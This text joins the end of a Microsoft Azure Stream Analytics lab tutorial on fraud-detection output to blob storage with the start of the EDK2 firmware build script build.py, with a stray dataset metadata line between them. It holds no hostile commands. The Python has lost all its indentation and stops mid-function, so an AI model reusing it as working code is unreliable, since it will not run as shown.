1. Type "FlaggedWithdrawals" (without quotation marks) into the **Output alias** box. Set **Sink** to **Blob storage** and **Subscription** to **Use blob storage from current subscription**. Under **Storage account**, select the storage account you created earlier in this exercise. Set **Container** to **Create a new container** and type "output" (without quotation marks) into the second **Container** box. Type "{date}" (without quotation marks) into the **Path pattern** box, and set **Date format** to **DD-MM-YYYY**. Then click **Create**.
> Each time you run a Stream Analytics job configured with a blob output, a new blob with a unique name is created. The purpose of **Path pattern** is to allow you to organize output blobs by date and time. In this example, the "output" container will contain folders whose names are the dates of the runs, and each folder will contain blobs with the output from those runs.

_Creating an output_
1. Close the "Outputs" blade and return to the blade for the Stream Analytics job. Then click **Start**.

_Starting the Stream Analytics job_
1. Make sure **Job output start time** is set to **Now**, and then click the **Start** button to start running the job.

_Specifying the job start time_
1. Return to the Command Prompt or terminal window in which you ran eventgen.js and execute the following command to run it again:
```
node eventgen.js
```
1. Wait 5 minutes or more to give the job time to start and eventgen.js time to transmit several hundred events. Then terminate eventgen.js and return to the browser window.
> If you'd like, you can open several terminal windows and run eventgen.js in each one to increase the volume of events.
1. Return to the Stream Analytics job in the portal and click **Stop** to stop it. Then click **Yes** when asked to confirm that you want to stop the job.

_Stopping the Stream Analytics job_
1. Wait until the job is stopped. Then open the blade for the "StreamAnalyticsResourceGroup" resource group and click the storage account you created in Step 2.

_Opening the storage account_
1. Click **Blobs**.

_Opening blob storage_
1. Click the container named "output."

_Opening the output container_
1. Click the folder in the "output" container.

_Opening the output folder_
1. Click the blob containing the Stream Analytics output.
> If there is no output blob, wait a few minutes and check again. Sometimes a blob created by a Stream Analytics job appears immediately, and at other times, it may take a few minutes to show up.

_Opening the output blob_
1. Click **Download** to download the blob.

_Downloading the output blob_
1. Open the downloaded JSON file in your favorite text editor. Each object (row) in the output represents a potentially fraudulent transaction. Note that **the number of rows and the content of each row will vary from machine to machine as well as from one run to another**.

_JSON job output_
Currently, the output from your Stream Analytics job is stored in blobs. In real life, you might prefer to view the output in a more convenient form, such as in a chart that's updated in real time. You could accomplish that by writing an application that monitors the blob and charts the data, or, better yet, by directing the output to an event hub and writing an application that subscribes to events from the event hub.
Microsoft recognizes that not everyone wants to write applications, and has provided an alternative in the form of [Microsoft Power BI](https://powerbi.microsoft.com/). With Power BI, you can create dashboards that render output from Stream Analytics jobs without writing any code. For more information, refer to [Stream Analytics & Power BI: A real-time analytics dashboard for streaming data](https://azure.microsoft.com/en-us/documentation/articles/stream-analytics-power-bi-dashboard/).
<a name="Summary"></a>
## Summary ##
Azure Stream Analytics is a powerful tool for analyzing live data streams from IoT devices or anything else that's capable of transmitting data. In this lab, you got a first-hand look at Stream Analytics as well as Azure event hubs. Among other things, you learned how to:
- Create an Azure event hub and use it as a Stream Analytics input
- Create a shared-access signature that allows event hubs to be called securely using REST APIs
- Create a Stream Analytics job and test queries on sample data streams
- Run a Stream Analytics job and perform queries on live data streams
- Create a rule (query) that detects anomalies in streaming data
- Use that rule to record anomalies in Azure blobs
One drawback to hard-coding rules into Stream Analytics is that rules don't "learn" from the data streams, which can lead to false positives in anomaly detection. If this concerns you, read the article entitled [Anomaly Detection – Using Machine Learning to Detect Abnormalities in Time Series Data](http://blogs.technet.com/b/machinelearning/archive/2014/11/05/anomaly-detection-using-machine-learning-to-detect-abnormalities-in-time-series-data.aspx) in the Azure team's Machine Learning blog. In it, they present an anomaly detection service accessible through a REST API that uses Azure Machine Learning to learn from the data presented to it. Imagine combining the power of Stream Analytics to extract information from real-time data streams with the power of Azure Machine Learning to learn from that information and refine the analytics on the fly. This is precisely the type of solution that Microsoft Azure empowers you to build!
---
Copyright 2017 Microsoft Corporation. All rights reserved. Except where otherwise noted, these materials are licensed under the terms of the MIT License. You may use them according to the license as is most appropriate for your project. The terms of this license can be found at https://opensource.org/licenses/MIT.
| {
"pile_set_name": "Github"
} |
## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2015, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import re
import StringIO
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
from struct import *
from threading import *
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.LongFilePathSupport import LongFilePath
from Common.TargetTxtClassObject import *
from Common.ToolDefClassObject import *
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import *
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2014, Intel Corporation All rights reserved."
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if os.environ.has_key('PATHEXT'):
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData="%s" % WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
#
# Check EFI_SOURCE (Edk build convention). EDK_SOURCE will always point to ECP
#
if "ECP_SOURCE" not in os.environ:
os.environ["ECP_SOURCE"] = os.path.join(WorkspaceDir, GlobalData.gEdkCompatibilityPkg)
if "EFI_SOURCE" not in os.environ:
os.environ["EFI_SOURCE"] = os.environ["ECP_SOURCE"]
if "EDK_SOURCE" not in os.environ:
os.environ["EDK_SOURCE"] = os.environ["ECP_SOURCE"]
#
# Unify case of characters on case-insensitive systems
#
EfiSourceDir = os.path.normcase(os.path.normpath(os.environ["EFI_SOURCE"]))
EdkSourceDir = os.path.normcase(os.path.normpath(os.environ["EDK_SOURCE"]))
EcpSourceDir = os.path.normcase(os.path.normpath(os.environ["ECP_SOURCE"]))
os.environ["EFI_SOURCE"] = EfiSourceDir
os.environ["EDK_SOURCE"] = EdkSourceDir
os.environ["ECP_SOURCE"] = EcpSourceDir
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
if not os.path.exists(EcpSourceDir):
EdkLogger.verbose("ECP_SOURCE = %s doesn't exist. Edk modules could not be built." % EcpSourceDir)
elif ' ' in EcpSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in ECP_SOURCE path",
ExtraData=EcpSourceDir)
if not os.path.exists(EdkSourceDir):
if EdkSourceDir == EcpSourceDir:
EdkLogger.verbose("EDK_SOURCE = %s doesn't exist. Edk modules could not be built." % EdkSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE does not exist",
ExtraData=EdkSourceDir)
elif ' ' in EdkSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EDK_SOURCE path",
ExtraData=EdkSourceDir)
if not os.path.exists(EfiSourceDir):
if EfiSourceDir == EcpSourceDir:
EdkLogger.verbose("EFI_SOURCE = %s doesn't exist. Edk modules could not be built." % EfiSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE does not exist",
ExtraData=EfiSourceDir)
elif ' ' in EfiSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EFI_SOURCE path",
ExtraData=EfiSourceDir)
# change absolute path to relative path to WORKSPACE
if EfiSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EFI_SOURCE = %s" % (WorkspaceDir, EfiSourceDir))
if EdkSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EDK_SOURCE = %s" % (WorkspaceDir, EdkSourceDir))
if EcpSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "ECP_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n ECP_SOURCE = %s" % (WorkspaceDir, EcpSourceDir))
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gEfiSource = EfiSourceDir
GlobalData.gEdkSource = EdkSourceDir
GlobalData.gEcpSource = EcpSourceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EFI_SOURCE"] = EfiSourceDir
GlobalData.gGlobalDefines["EDK_SOURCE"] = EdkSourceDir
GlobalData.gGlobalDefines["ECP_SOURCE"] = EcpSourceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(os.path.join(Workspace, FilePath))
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line != None and Line != "":
To(Line.rstrip())
else:
break
if ExitFlag.isSet():
break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first Argument in following Popen().
# It could be a string or sequence. We find that if command is a string in following Popen(),
# ubuntu may fail with an error message that the command is not found.
# So here we may need convert command from string to list instance.
if not isinstance(Command, list):
if platform.system() != 'Windows' or True: # VBox: Added 'or True' (for the hack below).
Command = Command.split()
# VBox: Ugly hack! python 2.7.6 on Windows doesn't seem to correctly search for GenFds (should find GenFds.cmd).
if Command[0] in ['GenFds',] and platform.system() == 'Windows':
Command = [Command[0] + '.cmd'] + Command[1:];
EdkLogger.info("Launching: '%s'; CWD=%s" % ("' '".join(Command), WorkingDir));
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Proc.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
if EndOfProcedure != None:
EndOfProcedure.set()
if Proc == None:
if type(Command) != type(""):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
if Proc.stderr:
StdErrThread.join()
# check the return code of the program
if Proc.returncode != 0:
if type(Command) != type(""):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other != None and self.BuildObject == Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(Lib, Target) for Lib in self.BuildObject.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in self.BuildObject.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = sdict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = sdict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = sdict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, in case duplicate build
_TaskQueue = sdict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.setName("Build-Task-Scheduler")
SchedulerThread.setDaemon(False)
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which will exits when no pending/ready task and
# indicated to do so, or there's error in running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = BuildTask._PendingQueue.keys()
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.isSet():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo = BuildTask._ReadyQueue.keys()[0]
Bt = BuildTask._ReadyQueue.pop(Bo)
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid tense loop
time.sleep(0.01)
# avoid tense loop
time.sleep(0.01)
# wait for all running threads exit
if BuildTask._ErrorFlag.isSet():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.isSet() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join([Th.getName() for Th in threading.enumerate()]))
# avoid tense loop
time.sleep(0.1)
except BaseException, X:
#
# TRICK: hide the output of threads left runing, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running method exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.isSet()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use threading.Event to communicate this formation to main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.isSet()
## Get error message in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use a static variable to communicate this message to main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is building or has been built. And if
# true, just return the associated BuildTask object in the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency == None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule:
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string contains the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
LaunchCommand(Command, WorkingDir)
self.CompleteFlag = True
except:
#
# TRICK: hide the output of threads left runing, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.isSet():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.currentThread().getName(), Command, WorkingDir)
# indicate there's a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.setName("build thread")
self.BuildTread.setDaemon(False)
self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
# @param BaseName The full file path of image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
self.Image.Size = (self.Image.Size / 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = BuildOptions.ThreadNumber
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
if self.ConfDirectory:
# Get alternate Conf location, if it is absolute, then just use the absolute directory name
ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = os.path.join(self.WorkspaceDir, ConfDirectoryPath)
else:
# Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
ConfDirectoryPath = os.path.join(self.WorkspaceDir, 'Conf')
GlobalData.gConfDirectory = ConfDirectoryPath
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
if BuildOptions.DisableCache:
self.Db = WorkspaceDatabase(":memory:")
else:
self.Db = WorkspaceDatabase(GlobalData.gDatabasePath, self.Reparse)
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
# print dot character during doing some time-consuming work
self.Progress = Utils.Progressor()
self.InitBuild()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
EdkLogger.quiet("%-16s = %s" % ("ECP_SOURCE", os.environ["ECP_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_SOURCE", os.environ["EDK_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EFI_SOURCE", os.environ["EFI_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
#
# Check target.txt and tools_def.txt and Init them
#
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
if os.path.isfile(BuildConfigurationFile) == True:
StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = gToolsDefinition
ToolDefinitionFile = os.path.normpath(os.path.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
if os.path.isfile(ToolDefinitionFile) == True:
StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
